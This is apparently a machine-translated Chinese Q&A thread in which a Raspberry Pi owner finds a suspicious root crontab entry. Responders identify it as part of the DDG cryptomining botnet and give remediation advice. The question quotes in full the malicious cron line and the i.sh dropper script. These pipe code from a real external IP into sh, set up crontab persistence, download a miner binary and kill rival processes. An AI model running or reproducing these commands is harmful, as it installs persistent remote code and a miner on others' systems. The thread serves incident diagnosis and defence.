可疑的crontab条目每15分钟运行一次“ xribfa4”

我想在Raspberry Pi上的根crontab文件中添加一些内容，但发现一个对我来说似乎可疑的条目，在Google上搜索它的部分内容没有任何结果。

Crontab条目：

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

的内容http://103.219.112.66:8000/i.sh是：

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

我的Linux知识是有限的，但是对我来说，从印尼服务器下载二进制文件并定期以root用户身份运行它们并不是很平常的事情。

这是什么？我该怎么办？

security cron malware

— 彼得·达姆
source

它是圆形的。每隔15分钟，它会下载并安装一个新的副本。如果/当更改远程服务器上的副本时，所有运行此cronjob的服务器将在15分钟内执行新代码。

— 通配符

您的树莓派可以上网吗？您的树莓派正在运行什么？当我搜索xribfa4时，这是Google上唯一的结果。如果您没有运行需要执行此操作的软件，则可能是病毒。

— kemotep

@kemotep该字符串是随机的，但是google为IP，它给出了一些结果。关于ddg僵尸网络的事

— frostschutz

我找到了。知识产权在印度尼西亚政府站点上注册非常疯狂。看起来也有将近2000个其他ip传送此有效负载。

— kemotep

您必须意识到的主要事情是，即使删除了该crontab条目，您的系统也很可能仍然具有允许其被感染的漏洞。您需要找到并修复该漏洞。

— Hans-Martin Mosner

Answers:

这是一个DDG挖矿僵尸网络，它是如何工作的：

利用RCE漏洞
修改crontab
下载适当的挖掘程序（用go编写）
开始采矿过程

DDG：针对数据库服务器的采矿僵尸网络

一个僵尸网络借用另一个僵尸网络的基础架构时的SystemdMiner

U＆L：如何在AWS EC2实例上杀死恶意软件？（受损的服务器）

— GAD3R
source

是的，实际上看起来就是这样。谢谢！如果没有新消息出现，它将标记为答案。

— Peter Dam

不要忘记针对有根机器的通常建议：尝试弄清楚它们是如何进入的，以便您可以修复孔。从中学到东西，并提高您的安全性。最后，核对并重新安装计算机。

— marcelm

好消息是，他们似乎没有为Pi配备矿机，仅为i686和x86_64。

— 标记

@Mark这是个好消息吗？有人使用未知入口点完全控制了他的Pi，并且可以完全访问Pi上的所有机密信息（包括但不限于密码）。矿工是否真的在“小麻烦”的境地。

— marcelm

@marcelm，攻击者获得了对其的完全控制，然后几乎可以肯定的是对该控制没有做任何重要的事情。

— 马克

找出实际需要哪些TCP和UDP端口，然后阻止路由器防火墙中的所有其他端口。可能不会再次显示这些crontab条目。

您可以使用Shields Up查看哪些端口是开放的和公用的！在grc.com上提供功能。

— 迈克·沃特斯
source

或者他可以修补此漏洞。

— 哈珀-恢复莫妮卡

@Harper绝对！那是给定的。我在想，也许不先阻止未使用的端口，在他尝试对其进行修补时，它可能会被重新感染。

— Mike Waters

：从security.SE相关评论security.stackexchange.com/questions/147770/...

— 通配符

总是这样（但不仅限于TCP和UDP）。可靠的安全模型，白名单或默认拒绝（拒绝您不明确使用或不需要的所有流量）是确保您的所有漏洞都不被渗透的唯一方法。

— antichris